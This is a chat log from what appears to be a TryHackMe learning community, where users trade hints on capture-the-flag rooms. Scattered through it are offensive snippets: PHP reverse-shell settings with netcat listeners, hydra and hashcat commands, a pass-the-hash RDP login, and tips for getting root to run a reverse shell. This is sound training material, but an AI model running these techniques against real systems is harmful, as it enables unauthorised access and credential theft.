#room-hints
what port did you set in the rev shell???
80
.......
that looks like not rev shell code
yeah that would be bad
try and use a port above 1024 port number
as anything lower than that needs administrator/root perms to be used
i had it on 1234 and 9999 before and same error message
do you have a firewall up somewhere???
not on the VM
I guess that's pretty obvious, but check if you have the right ip address on your php rev shell
again. the .php5 file
that is the line that pentest monkey's php revshell outputs in the window on the website when you navigate to the php file to spawn the shell
but the last part is some clear error
i saved the file and that is content of the file
i tried to use the default .php extension it was not allowed for upload it was allowed for the .php5 . I changed the port to 1048 and nc'd that port and curled and same results
i just used my .php5 on that machine rootme and it worked for me
i tried with php5 and phtml, both worked. Verify that you have your THM ip on the $ip variable
if phtml is a file extension ill give it a try
php-reverse-shell.php5 the http://10.10.98.0/uploads/php-reverse-shell.php5 it's an incorrect file content
As shadow said before, you can use whatever port you want above 1024 without super user privileges.
```
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.33.184'; // CHANGE THIS
$port = 1234; // CHANGE THIS
```
is what shadow used on their attackbox.... but of course that ip should be changed for your own attack machine ip
let me guess it's not working
ok so mine looks like yours but with my information I don't have any changes except with the nc i get a "cant access tty;job controll truned off" message now
can you post pic of php-reverse-shell.phtml that is on your local file. not uploaded one
@chrome hull If it looks like this, then you got your shell.
oh then I have my shell then XD
run python -c 'import pty; pty.spawn("/bin/bash")'
you did get rev shell ?
or did you mean the actual shell from the terminal ?
did you manage get the shell back?
@ebon jewel
@ebon jewel https://prnt.sc/1xykHnW-zpg8
yeah if you get a $ in the terminal while running nc -lvnp 1234 with a blinking cursor at the end you got a shell
from there you stabilise the shell and get going
sry. my writing skills today are crap today. bit awake too long
it is fine ralex
lots of misunderstandings above
was confused by the content of the rev shell file =/ yea
Thank you @alpine kestrel @fathom dome @ebon jewel
Gave +1 Rep to @alpine kestrel
+rep @fathom dome
Gave +1 Rep to @fathom dome
will get back on getting that last rep point to ralex in 5 mins
+rep @ebon jewel
Gave +1 Rep to @ebon jewel
aww
Shadow, you're from sweden right? Ever listened to Bathory??
do not recognise that band name no
when you examine the contact-msg. the right side of your pic. does anything stand out as answer/flag
Gave +1 Rep to @ebon jewel
im searching for files with SUID permissions is " find / type -f -user root -perm -u=s 2> /dev/null " not the correct command for this?
what room
rrootme
you are close for sure. bit wrong command but close
I found it thank you @ebon jewel
Gave +1 Rep to @ebon jewel
my goto command is find / -perm -u=s -type f 2>/dev/null
Hello guys, i'm doing a VM , having a hard time trying to priv escalate.
Can't find a way to do it, would someone please analyze the linpeas output and maybe give me a tip of what way should i go?
hi guys am a newbie here, trying to do my introduction to cybersecurity, i am at intro to offensive security, however i cannot tell how to access the next room, kindly assist
I believe i did.
But i am even struggling to send the screenshot i took using the snipping tool,still trying though
any advice on why my hydra command isn't working : https://prnt.sc/mfVL9QL6Si62
there is no rockyou.txt , have you recently installed kali? unzip the file
oh... much better... is not 'wordlist', is 'wordlists'
with letter 's' at the end
Enterprise room. Anyone knows what that error is? Can't dump the hash
i see i left the S off thank you
Gave +1 Rep to @hot tusk
hi, am doing the cat pictures 1, and right now am inside the internal shell service through nc, and because its in restricted environment i can't perform most commands, and i have seen on binary (i guess) in the user profile too, but can't access/execute it.
tried to transfer it, but still the same error, can't execute in this shell.
if someone gave hint, that would be helpful for me.
https://tryhackme.com/room/catpictures
For the dynamic analysis: debugging room, I cannot seem to figure out task 2 q1. It asks what kind of analysis technique is being avoided by malware checking timing stuff. I assume the answer is something along the lines of sandboxing/virtualization analysis. Am I on the right track?
I am starting Island Orchestration and I am guessing I am supposed to port scan. Every time I port scan from other labs, it crashes. Is there any nmap command that these labs like more ?
Hello
And what do I need to verify myself?
!docs verify
follow the steps in that link @short steppe
Hello I'm trying to complete the OWASP top 10 2021 room and I'm stuck in task 15
I have spotted the vulnerability but I can't find a way to print the flag to the screen
Bookstore RCE?
Yes yes
I tried to output the file's contents with iframe and then with php and didn't work
I couldn't figure out how to do it with JavaScript either
for context:I want to get the contents of /opt/file.txt
Hi there, I have gone through most of these recently and want to help as much as I can, hopefully without giving the answer.
Starting from the top:
So you have the exploit now. What do you do with it?
If you have the correct exploit, try executing it, does anything stand out relating to "usage" error? This may give you a hint as to how you are supposed to execute the file properly. Also, remember what IP address and port you are attempting to exploit.
Once it executes properly on your target, and it appears that you have attained RCE, use the command to list out the path/read contents of the flag file. Do you know what that command is?
I think I'm missing the last piece of the puzzle
I think I just need a command that outputs the content of a file in console or alert window or the page itself
I might do more google searching in a bit
I could be assuming too much, and I apologize if I am either confusing or steering you in the wrong direction, but you could potentially have a different setup or went a different route than me.
I am using the THM provided AttackBox, and was able to perform this all from 1 terminal window. If you get to a point where you have achieved RCE privileges on the target via a terminal window, there is a simple command that I was able to use to display the contents of the needed file.
Ohhhh I got mixed-up with the terminologies I have a XSS vulnerability
nice to meet you all
I ll try to figure it out by myself then thanks for the hints
OK, sorry that I could not help, but I will add that if you are on the OWASP Top 10 - 2021 Task 15 Vulnerable and Outdated Components - Lab , there is an exploit that can be found while searching through Exploit-DB. Happy hacking!
Yh it's okay I just found another exploit about xss
And I thought I had found the correct one
anyone else doing overpass3 and having trouble uploading their shell via ftp? I've logged in via ftp using the user credentials, changed directories over to backups and used put ~/Downloads/payload.sh.php and keep getting an error saying it could not create the file. Looked at walkthroughs and nobody else is getting that error. my shell is correct as well, anything i try sending using the put command doesn't work.
Hi,
Sitting with the "Crackthehash" room
https://tryhackme.com/room/crackthehash
And can't get hashcat to find it with the rockyou.txt
Becomes "Status: Exhausted"
Which task?
Sorry, last task.
PrivateBin of the output and command.
||https://paste.offsec.com/?bca2ee2ad4c45422#afXHJlrf37qUy2NVVI2w+wIg+rIORoaVb2IrEopPEYk=||
I guess I must be missing something, any hints
!docs verify
Can you verify and paste the image in here, I don't want to click a link.
urlscan
I shouldn't have to.
One moment
Think I'm verified but can't add images :/
You're not verified
You need to open up your DM's to the server.
Your privacy settings are blocking the bot.
Gave +1 Rep to @lucid junco
Are you doing task 1?
No, the last one.
@lucid junco any idea about my problem.
I can encode it the other way with that SALT but not crack it.
In the beginner training for operating system security, can someone find the password for the user johnny? It doesn't seem like I can upload a screenshot
This room introduces users to operating system security and demonstrates SSH authentication on Linux.
where do I find !docs verify?
!docs verify
!docs verify
Okay now I can paste screenshots. Am in this beginner room stuck here:
For the life of me I can't see anywhere on how to find a password for johnny username
Based on the top 7 passwords
Use the list given in Task 2.
ah okay thanks
Gave +1 Rep to @lucid junco
how can i post screen shots here?
!docs verify
Follow the link.
is this hashed password with this salt set up correct in hash file?
i've waited for hours!
What's your syntax?
what can I use to examine this file in this challenge? radare?
https://tryhackme.com/room/0x41haz
The message I get when running it is
-> r2 0x41haz.elf
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
-- That's embarrassing.
[0x00010000]>
This is going to take a considerable amount of time to crack, even on your host OS. Use hashcat with the sha512crypt format (1800), specify attack mode 0 and wait.
if you still have issue. what command did you use for it
How are you running it? r2 ?
I just found the solution, I had to do something before running it with r2
Ghidra? >.>
||test||
Test succeeded.
spoiler: ||hexedit and edited MSB to LSB|| then it ran ok in r2
ghidra would work too though
Ah!
yep
Did it run ok then?
crack the hash 1
hashcat.exe -a 0 -m 1800 hash.txt rockyout.txt --force
I waited for a long time, after that the crack started and after some seconds it stopped and gave me error like this memory cpu can't take it something like that, but i know it is my laptop, it can't handle it.
!docs verify
I'm a novice, anyone has an address for the dark web, I'd like to know about it. i will thank him
Yes, it's at https://admin.tryhackme.com/portal?location=dark
Anyone can help me with Madness room ? I have 1 question
oh, one of my favourite rooms!
yes, it's very nice ^^ i'm glad I managed to finish it ^^
damn it. you got me.
I nearly ended like the mad hatter after hours not understanding what's going on there. But I loved it and after getting in PrivEsc was quite easy... But to the question, i found sth. like: "for i in {start_port..end_port}; do ssh some_options <ip> -p "$i"; done" quite enlightening
This is a categorized list of notable onion services (formerly, hidden services) accessible through the Tor anonymity network. Defunct services and those accessed by deprecated V2 addresses are marked.
OK, thanks
Gave +1 Rep to @strong lance
pls guys i need help with a room, have been stuck for some hours now, the title of the room is "walking an application" under JR Pentesting, Task no: 3,
i just can't figure out the real ACME IT SUPPORT website to get the flags from.
You need to start the machine in task 1,
im trying to use hydra to get into a FTP port I have potential username but my hydra enumeration is a bit wonky I was curious if anyone knew if my commandline was missing anything? :
hydra -l maya -P /usr/share/wordlists/rockyou.txt ftp://10.10.28.133
looks good to me
you can specify how many threads you want it to run with -t, default is 16 for ftp
so would it be hydra -t 16 -l then the rest ?
well if you put it to 16 it doesn't matter, but you could do hydra -l maya -P wordlist.txt -t 32 ftp://127.0.0.1 to use double the threads
especially for ssh bruteforcing in CTFs it can be helpful, hydra defaults to 4 (slow) threads with a warning that more can confuse the ssh service, but I usually run it with -t 20 without a problem and it's much faster
oh wow thank you
Gave +1 Rep to @peak grotto
is this speed normal ? [STATUS] 308.57 tries/min, 2160 tries in 00:07h, 14342253 to do in 774:40h, 18 active
looks fine I think? I haven't had to bruteforce many ftp logins, you can probably crank up the threads even more but if you haven't gotten it by now and this is a ctf then you are probably on the wrong approach
I don't have it yet and this does look like the wrong approach lol
is it a ctf? They are usually tuned so that if you do have to bruteforce it shouldn't take too long with a standard password list (usually not more than 5min or so). Sometimes you have to use a custom wordlist or have some information about password policy to filter out passwords that don't meet a certain criteria
or maybe there is another user
Which room are you doing?
"startup"
it's supposed to be the absolute basics of CTF from the description
plz dont say bc you can anon login on ftp
Bingo!
sec afk crying
Don't you nmap things? lol
lmao poor guy
nmap was the very first thing i did and i can't seem to get a solid response
What's your ip?
" All 1000 scanned ports on 10.10.167.172 are in ignored states.
Not shown: 600 closed tcp ports (reset), 400 filtered tcp ports (no-response)"
target machine or vpn ip ?
please how can i use Kali linux to run the exiftool for the letter-image.jpg and not the Attack box
You need the letter on your kali machine.
You can't exiftool a file that isn't there.
I ran nmap -sV -v and got that error I posted ill try your line and see if i get better results
exiftool is on Kali by default...
how can i get the file on my kali linux
though, i have used jimpl.com to find answer to the question
You can download it from the task, and transfer it via python server, drag and drop, or a shared folder if your VM supports it.
spin up the attackbox, cd to the directory and spin up a python server
python3 -m http.server
Then on your VM
wget http://machine_ip/filename
thanks so much..i really appreciate
hello everyone, this was taken from the Autopsy room , task number 7 "What self-assuring message did the 'Informant' write for himself on a Sticky Note? (no spaces)" when i enter the answer , it say it is incorrect , does anyone else experience this?
Stupid question how do you connect to the https://tryhackme.com/room/enumerationpe linux machine. SSH port is open but I have no idea what the password and username to connect to the machine.
Am I meant to get initial access by hacking something before I even begin with the room?
I'm confused.
Hahahahaha never mind the login credentials where at the bottom of the room.

Saves brute forcing it with hydra.
I cant seem to figure out why my netcat will not run. any advice is much appreciated https://prnt.sc/J3amh9IhFBv4
i've reinstalled it and updated everything but idk whats causing this
Try -lvnp
it worked should the ip show all 0's though ?
No?
Can you show me?
That's just listening on any
You can specify the ip.
thank you
Gave +1 Rep to @lucid junco
im downloading a .pcapng file to go over logs in wireshark but it keeps saving it as 'index.html' even after scheme specified is there a way to address this? i've looked online for what i could be doing wrong and hit a wall
the direct path once i reverse shell into it and located the path it was ' wget ftp://10.10.155.51 /incidents/suspicious.pcapng '
I tried it wont let me use get
Is it because you have a space between 51 / ?
" No command 'get' found, but there are 18 similar ones " your guess is as good as mine
if i don't have a space i get an error
Screenshots are king.
Gave +1 Rep to @dusk totem
Can anyone please help with the throwback network?
idk how long finding it will take just wanted to let you know lol
im cd'd to the ftp directory is the mv line i presented correct or does it need to be adjusted bc of the pwd ?
What room are you doing?
startup
same line just copy instead of move?
you might need to type out the full pwd
so
cp /incidents/suspicious.pcapng /var/www/html/files/ftp
i'd go with /html/files/ftp over /srv/ftp ?
Yeah.
Are you in the directory of the of the pcapng?
no im in the ftp directory
That would be why, you need to be in the directory of the pcapng to move it.
It will have more than /incidents/.. etc in there
ok sec
im guessing it timed out. im going to reset the shell connection : https://prnt.sc/9pXmwcT4BZ8s
it doesn't show in the directory anymore https://prnt.sc/47c161DuAIoy
Network services 2 Task 3. The nmap scan we are told to do. how long does it take? i've been waiting for 15 minutes and it hasn't moved. Does it actually take this long? Is my laptop that slow or does it actually just take long
Usually nmap scans take 15mins at most for rooms in my experience. You can speed this up by adding the switch --min-rate 10000 keep in mind that increasing the speed might miss things but I have found that this rate is usually pretty good for rooms. Also adding -vv nmap will output each port as it scans it so you can see if it freezes
hey guys
i issued several times the same issue with room wreath regarding connecting with rs_ida
hi, was wondering if anyone could provide a hint for the tomghost room
I got the user flag but I'm a bit stuck on escalating privileges to get root
sudo -l
Then GTFO bins.
sounds good, I'll take a look there. thanks!
Gave +1 Rep to @lucid junco
doing https://tryhackme.com/room/adventofcyber4 day 9 and I can't quite get why the answer for CVE seems to be a bug that is exploitable on versions prior to 8.4.2, whereas the application has version 8.26.1
also: where does this ip come from?
Cracking hashes can take a very long time and is very hardware dependent. How many hashes per second is yours running at?
Oh ya that's going to take ages. I suggest that if you already have it running for this room I would just look the hash up since it's a hardware limitation slowing your learning down. That room is more meant to show you how to crack a hash and your command will work, it's just a matter of time
Ya it might be that you need to use the other version of hash algorithm. Sometimes the first option that you try isn't correct and you have to try multiple to get it to crack
Okay then it's just a matter of time but also that particular hash is able to be found from https://hashes.com/en/decrypt/hash their hash table contains the answer
Decrypt and crack your MD5, SHA1, SHA256, MySQL, MD5 Email, SHA256 Email, and NTLM hashes for free online. We also support Bcrypt, SHA512, Wordpress and many more.
Ya no problem you won't always find hashes there but it can't hurt to check hashes you find on those quick as it can take a while to crack certain hash algos
nudge for "AWS API Gateway"?
Is this on the new AWS path?
ye @lucid junco
You might not get help with that path in here, as most of the volunteers don't have access.
trying my luck lol
hello,
I don't see how to access the admin page in the OWASP room Top 10 - 2021 > Task 22, bonus question.
Do either of you have a clue?
Feel free to send me a DM.
Hey, thanks for responding, already figured it out
Gave +1 Rep to @hexed crescent
Hello could someone help me with giving me a hint with a CTF challenge? It's with wireshark a
And trying to filter for passwords
You're welcome, glad to hear you figured it out.
Is this a tryhackme room?
Hey everyone. I am stuck on finding the flag for the Snapped Phishing Line room. I've read through the forum hints but still can't figure out where the flag is. A hint would be appreciated
Yes it is!
||Check the subdirectories for the URL of the attackers domain. Think of what you would call a flag file and file extension you would use.||
You can shoot me a DM if have a question or want a hint on a room. If I have done it I can try to help or maybe I can start the room.
yes I just moved it to the ftp directory and downloaded it from there and it was ezpz from that point
Hello, I'm stuck in the Networking Room, Enumerating SMB. I can't figure out what sticks out as something interesting to investigate. What happened to the youtube walkthroughs? Did I not run a good nmap scan? Do I have to download enum4linux to complete this section?
Has anyone completed Insekube room ?
The "interesting" something you want to investigate is one of the file shares, use enum4linux with the -S option to list the ones available on the machine.
eugh enum4linux
outdated stuff that barely works
smbclient can easily replace it
I have not but I will start it quick. What's your questions about the room like which task are you having issues with?
Thank you for replying
I have doubts in the final task where i need to break out of the pod to get the root flag.
Gave +1 Rep to @high harbor
hello guy, am stuck on a task at the jr pentesting room, i tried connecting openVPN to my kali machine but it's giving this error "Options error: In [CMD-LINE]:1: Error opening configuration file:
please paste the command and full output
Linux PE ==> PE Capabilities lab : The flag file already has read permission for others and it can be viewed even without escalating privileges. Bug?
That error usually means you need to specify the path to where you have the .ovpn located. If you aren't sure what it needs to be, navigate to where you have the file and run pwd, it will show the full path
Working on Madness room (https://tryhackme.com/room/madness), was wondering what the next step I can do after getting the secret? There was a disclaimer that bruteforcing is not required so I wanted to know what technique I can try. I seem to be looking for a username.
How can I connect tryhackme account on discord? can you help me?
The TryHackMe Discord Server
This is one of my favourite rooms!
Where are you in the room?
I am trying to enumerate users at the moment. I already tried looking for hidden directories, tried to look for hidden files, etc.
So.. the start?
No. I already have the secret, so I'm looking for a user.
I already learned something from it and I haven't even got the initial access. 
Have you found the ||secret directory|| ?
Yes, including the || parameter value ||
Did you get ||the number|| ?
Yes.
Yes
And this is where you're stuck?
I got some random value, I tried to check if it's a hash or encoded text, but it isn't so I'm assuming it's a password.
Yes please. Is it the password? If not, I'll try to check again.
You're not finished with the ||THM picture||.
I was thinking the same thing, but I already tried binwalk, steghide and stegseek. Even strings.
I'll check this again. Thanks!
Gave +1 Rep to @lucid junco
||steghide|| gave you nothing?
What syntax did you use?
I was stuck at the password
Just thought of using the value I got as the password to extract the hidden file.
I remember I also got stuck on the EasyPeasy room because of the exact same stage. 
Thanks for the nudge!
Gave +1 Rep to @lucid junco
||The password you found should be the key||
Yeah, I just got it.
Yeah.. time to look for hints again. At least I was able to move forward. Stuck on that part for hours.
"We're all mad here"

I just remembered that I'm also stuck at Wonderland.
I should complete those unfinished ones first before starting new ones.
Bahaha!
wonderland was beautiful, good place to fall in rabbit holes (:
Yeah, stuck at the PE stage and looking at multiple options already.
Did you finish Madness?
Will take a stab at it again tomorrow if not today.
Not yet. Had to stop because of work.
Out of seeing you guys talk about Madness room I thought I would give it a go and I just got my foothold. I am so not trusting anymore haha
Good for you. Haha. At least you already have your foothold.
You got this. Just have to keep looking.
How are you getting on?
I need help
We might be able to help bud, you just need to tell us what it's concerned with.
I reset my password and can not log in my account
What sort of error do you have?
Hi, I would like to know if you can help me get access to my account. My phone with my 2FA App on got stolen and it didn't backup my 2FA Codes. Now I can not get back into my account and need to reset the 2FA. Please Help Me.
it was remove but can not login my account
sharp en thanks
Still stuck on trying to get the password so I worked on different boxes first.
Would you like another clue?
I'll give it a shot again later today and tomorrow. I'm trying to define or document a mind map of some sort as there are things that I sometimes forget. I really need to up my enumeration.
Gave +1 Rep to @lucid junco
Hi all, can I get a hint for PS Eclipse room, question 5?
I don't get what format is needed because in the flag place it is "Answer format: ** **********:**************************. / / ***************." but in the description it is (Format: User + ; + CommandLine) can I get clear description or hint, please?
The format is just a copy paste of the information you found about the suspicious binary. ||<USER>;<CLI _Command>||. Put what you are thinking the answer is based off that.
Thing is, like let say, first part is question about"What permissions will the suspicious binary run as? " - this will be SA and there is a field to type in **(SA), but I will try what you suggested, maybe it helps because I see I got misled in to rabbit hole by my interpretation of description/question. Thank you for getting back.
I don't have the room booted up myself and I did this room a long time ago so not sure where you are getting the binary runs as "SA". I will give you, if you want, the User that is the start of the command should be: ||NT AUTHORITY\SYSTEM||
Thank you, but won't look in to it now, will try myself to find out.
Gave +1 Rep to @high harbor
I actually booted the room up again for myself to jog my memory. The user isn't going to be found where the command is run but instead ||look at where the command was created||. this is a hint, not giving directly the answer, just where to look for it.
I've got the flag, just trying to connect bits why it's on that privilege, because under user we don't see any run by the User that we have in the flag.
If you look at the create command of the task itself. You have to look back at the answer to question 4. If you break the command down and look at what each of the parameters it's being fed you will come to ||/RU SYSTEM||. that switch is telling the task what to run as when executed
yes, you are right, thank you. I missed that part and where in logs searching for the execution log, now I get it
No problem happy to help. I am very rusty when it comes to Windows commands.
What else to get better with Splunk for BTLOv1 exam would you suggest to get in to:
Conti, New Hire Old Artifacts, Splunk 2, Splunk 3?
Let's say is there any grade, except (easy/medium)? or this is not the room to ask this?
For TryHackMe I have only done that PS Eclipse room for splunk related content. I would just suggest if that is something you want to learn more about just pick any of them. I am sure they each can teach you something different with a bit of overlap. If you just search Splunk in the search tab under Learn it shows they have 9 rooms in total tagged as Splunk
yep, 4 left to go then. Will take "New Hire" then as I feel BoosV2 and V3 will be most hard
Hi, can I get clarification on what is needed under room "New Hire Old Artifacts" question number 3 is misleading me.
What was the name of the binary? - clear for me and I have answer.
What is listed as its original filename? - clear for me too.
(format: file.xyz,file.xyz) - clear too.
File path should include username in long name format. - what exactly would it mean?
Does it mean it should be ||C:\Users\FINANC~1\AppData\Local\Temp\Procmon64.exe|| or it should be ||FINANC~1\AppData\Local\Temp\Procmon64.exe|| or it should be for example ||Procmon64.exe,Procmon64.exe|| the biggest pain in the kidney for me is the way that flag format is requested to be, like task is easy but the time wasted is to understand and find out what flag format is requested to be able to move on.
UPD: 2:29 AM GMT. I've fought with an appropriate flag to be submitted and wasted 2h on that instead of task investigation. Task solved but mods, please, review how questions are stated and how "hints" can mislead. Thank you.
Mods aren't site staff.
Finally rooted the box. Retraced my steps at least 3x until I had nowhere else to look but that file. 

I thought that was the best last lol
Hahaha. I already have an inclination to look at that file, but then said to myself that I must have missed something. I also thought of doing OSINT, but all I saw were links to writeups so that didn't help as well.
The room name was really suited to it. 
Just got my first privesc, but from the looks of it, I'm guessing I may have to do at least 2 more privesc before I root the box.
I only remember that you need to go to the tea party
I'm at that part at the moment
Hiya.
and currently trying to crack hash using hashcat but it has been running for ever!
Are you using the correct syntax?
hashcat -m 3200 "\$2y\$12\$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom" /usr/share/wordlists/rockyou.txt
i found out that mode should be 3200
and used this
do you think it is correct?
it's just displaying hashcat is running and time estimated is 46 days!
have you done this lab already?
Yes, but it was faster on mine
Well, which question are you doing?
maybe my processor is shite
just need to crack this hash
$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom
why did you add the "$2y" ?
but it's there in the original hash I didn't add anything
Gave +1 Rep to @lucid junco
still the same :/
Yeah, it won't be immediately...
Do you want a hint?
that would be helpful yes because i have been fiddling with this for hours now
use -a 3 ?l?l?l?l
This will use a mask attack, and only search rockyou.txt for a 4 lettered undercase word.
oh i am using -a but thanks for the rest!
?l - Undercase
?u - Uppercase
?d - digit (0-9)
?s - special character
?a - all characters
Hello, I have an issue with a room... I'm supposed to scan some ports, but those who interest me are closed... so I can't answer to the question
I can give more informations about the exact exercise
Which room and task?
Networks Services, Task3
I should see the ||SMB ports||, but since my scan showed me opened ports and those 2 are closed, I can't advance
Plus I can't answer the first question, since I put the exact number of opened ports, and it's still wrong
What ports are open when you scan?
Opened: ||80, 111, 389, 3389, 5901, 6001||
Filtered: ||7777, 7778||
I know the ||smb ports|| are ||139/445|| cause I googled it, but I want to see it and answer to the first question
Which machine are you scanning?
Can I have the IP please?
I scan the machine created on THM
IP: 10.10.154.229
You're scanning the wrong ip.
That's the attackbox
Press that button, "Start Machine"
When I try to click on « start machine », nothing happens and the timer begins
And you'll get a box up the top with an active machine information
In there, that's the IP you "target"
Oh fuck
I forgot it
Im so dumb I'm really sorry
Now I have the good number of ports
Lol, no worries!
Thanks a lot!
Hi All,
Can someone help me with the Agent Sudo room. Zip file password question.( If facing a challenge while
- I was not able to see the zip file when executing the binwalk for the cutie.txt.
- I have checked that file has the wrong hex gradient. So i have changed it; even after that i was not able to find what the issue was. I could not find the zip file .
But when i check the image file using strings command i can see that there is a hidden file in the image.
Thanks in advance for the help.
try binwalk on the image
tq
Hi guys, in the unified kill chain framework, at what step the attacker gains the actual access to the system? Is it at exploitation?
Which task number?
hello
Linux basics part 3 room: the apache2 file is not in my attackbox. Could you help me?
Ben
Hello, can you send a screenshot of the folder please?
You would probably have to cd to the /var/log/apache2 directory in the target machine.
anyone been doing Forgotten Implant? I'm a little stuck... I can see a request but unsure what to do with it
||base64||
hello
Task 2 of the Authentication Bypass module: I enter the command required by the problem. The command runs completely, but no result is displayed. How do I solve the problem?
what's the command you're running?
Hey folks, question: I am on Intro to Defensive Security, Task 3. I completed the task, but the question "What is the flag that you obtained by following along?" I can't find it anywhere.
It's on the website you start with the green button.
need some hints on https://tryhackme.com/room/basicpentestingjt on enumerating users. From the hint I know to ||leverage smb for enumeration||, so I do
||nmap --script smb-enum-users.nse -p445 <IP>|| but it returns no results. Also tried ||port 139|| but with no luck.
Hey y'all, can someone give me a hint: what can I do if I have a .sh created by root and this .sh calls a script written by the user?
Room ||"Startup"||
This means any code you put into the script that is called (user owned) will be executed by root when they run their original script
Just make sure to set permissions correctly
but when I try to spawn shell -- it spawns with user priv
Everyone should have a right to execute
Root should not only create the first script, but run it
Or you should run it as root
Unless it has SUID bit set
If you are the one running it -- you get a shell as you
hmm, so I should find the way how to execute it as root, maybe check cron or something like that
Thanks!
Gave +1 Rep to @honest wagon
Have to read through privesc in basic penetration testing soon
Basically, must force root run it, or find a way to do it yourself as root
And since root will be running it, don't just put bash there
That would spawn a shell for them, not you
Make them do some operation that would give you access
Reverse shell, changing permissions, etc etc
morning guys
my name is Benjamin, I need some help please. I'm new to cyber and I'm having some challenges; I'll be glad if someone can be of help, or as many lol
thank you in advance
what exactly are you looking for
@edgy agate thank you for getting back to me
Gave +1 Rep to @edgy agate
I'm having some challenges on defensive questions
What is the flag that you obtained by following along?
hey y'all, I'm stuck on task 5 in Local File Inclusion #2. The VERSION_ID is 18.04 according to os-release but it's not taking that as an answer. Did I miss something somewhere?
I've been stuck on the MITRE room task 3.9, I can't seem to find what other group overlaps
nevermind, I just need to read the WHOLE page next time
I'm also now stuck on the challenge for task 8 in File Inclusion. I don't quite understand LFI, and it seems like you need extra knowledge and/or tool experience to actually finish this challenge.
It's basically when a person can access files which aren't supposed to be accessible on the webserver. Usually this can be spotted when there's something like "?foo=bar" and bar is mostly in plain text or not encrypted
Is there a format in the answer ?
Happens because any input given is literally treated as trusted, so if you were to put a local file into the URL it would literally give its output since there's nothing to check
Can someone help with the Alfred room task 2? I am getting this error when trying to download my payload
Why is the file name rev-shelll.exe~
I don't know why I am getting a 404 and then it shows up
ignore I mistyped my msfvenom
Hi, can someone help me in the Daily Bugle room? I am stuck. I found the password and connected, but when I edit the index.php to a reverse shell in PHP and set up netcat I receive no shell, even when I reload the page ten times
Ye, turns out the answer is outdated. Current ID is 18.04 but the "correct answer" is 12.04. Sounds like the ID updated but the answer didn't.
Hi, anyone that can give me a small hint on Pickle Rick?
Did enumeration, found username, but what next? Did I miss results in my enumeration or should I proceed to the next phase?
What task are you at
First one
Got a few steps further. Thanks for now
Ah I see
hi guys
a little hint for the OSIRIS room
I created a new local administrator on the machine
I have turned off firewall and Defender
changed the NTLM password for the chajoh user
but I can't login with:
xfreerdp /v:10.10.118.53 /u:WINDCORP\\chajoh /pth:610b3d657797a3db5bbcde10dc28baaa /dynamic-resolution /cert:ignore
xfreerdp /v:10.10.118.53 /u:chajoh /pth:610b3d657797a3db5bbcde10dc28baaa /dynamic-resolution /cert:ignore
xfreerdp /v:10.10.118.53 /u:WINDCORP\\chajoh /p:"ChangeMe123#" /dynamic-resolution /cert:ignore
any idea/hint
& any idea where I can find this tool CQMasterKeyAD.exe?
sounds like you found a user that is not rdp enabled
a user said he was able to log in with that account but I'm starting to have doubts.
Assigned to Everyone the "Remote Desktop User"
the only user i had on machine
Administrator DefaultAccount gian
Guest scheduler WDAGUtilityAccount
but...I think I'm close to the solution
maybe you don't need to login as chajoh. Once the KeePass key has been recompiled, I should still be able to log in by passing the master key for KeePass.
x) the only problem is that I have to find a way to replace the key
Now swap the old masterkey file with the new one and set the system and hidden attributes, see example
Hello. I've been trying to use SSH to access the room box from my attackbox, and usually the password was tryhackme but now it doesn't work. Is there a reason for this? I'm working on Network Services and SMB
You don't need to access via SSH for that box.
Not all rooms have ssh login.
Oh, okay. I am trying with the correct syntax of smbclient and I keep getting an error but looking up the error right now
Can I DM you for some help on this room? The forums on the site aren't really showing anything and the one post I found had nothing that really helped.
Hey all. Can anyone give me a hint for flag3 in Olympus. Got user flag and escalated to user from www user.
try to find unusual files which your user or user's group has read permission on, and see where it leads you.
I'm attempting The Quest for Least Privilege, and Task 1 (question reads "If you are denied access while you have this policy, what type of policy is blocking you?") has me proper stumped. I'd be grateful for any hints as to where I should be looking.
I think not many folks can help as the AWS Path is limited to Business Users only, but there will surely be folks who can chime in.
Ah, damn, that makes sense. Thanks dude.
Peonnaly in the task text
kind of stuck in the "Year of the Rabbit" room. Got a directory from style.css and accessed it; it said the video contained some clue but it doesn't have anything interesting, the source code has nothing interesting, there are no hidden directories, nothing in cookies... any idea what I am missing?
not familiar with the room but do know that THM likes steganography so maybe run with that and see if any hidden info shows up
does the video contain morse code or something like that??
From memory, there is at least one hidden directory you can find with a tool like gobuster and a common directory list. The key, when you find it, is to continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, ... After a while it will become obvious.
nah, its just rickroll
hmm, come to think of it, I haven't checked the requests it makes when I access the webpage
I will check through that, thx
Gave +1 Rep to @random pond
Can someone help me with the hack the park room https://tryhackme.com/room/hackthepark
Last task (5) How do I use winPEAS to find the original install date? || I was able to find it using systeminfo but not winPEAS ||
could need a hint on: https://tryhackme.com/room/fileinc
task 8, flag2:
setting || cookie to admin || is no problem, but i have problems to interpret:
Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
in general I have problems with this LFI and RFI topic, drawing good conclusions rather than just trial and error; I understand the basic concept but I don't really get how to properly enumerate...
EDIT: wow, okay, after a break I got it... didn't know that cookies can be used in this way... it's all about cookies...
well cookies can decry to get some useful information from them indeed..
i got stuck on crypto 101 task 11
help:
- gpg import the .key
- decrypt other file
you will get the flag
And what you stuck with exactly?
Can someone give me hint for Crylo room
I got nothing .
Stuck in Bypassing login page
I was lost about what to do with the .key file. Reading the docs, the import of the key was not clear to me
luckily someone else posted what they did here, there are no writeups for the room
Alright, so I guess you are good now?
If I recall, this box is fairly new and hints will not be given in the first 72hrs.
Thats sad : )
Hello guys, I need some help
I've been stuck on the question
"What do you need to access a web application?"
I tried - web browser, internet connection, URL / link, Authentication Credentials...
doesn't seem to work
thanks in advance
posting the task would be helpful... in general there are stars in the answer field which show you how long the answer is and something about the format, e.g. if the answer were web browser you would see *** *******
I tried to attach a screenshot but Discord doesn't allow me?
it's in the Web Application Security module, I will provide a link
I would be very grateful
You are close, but the word you are looking for only has 7 characters
According to the asterisks in the answer field
what could possibly be,
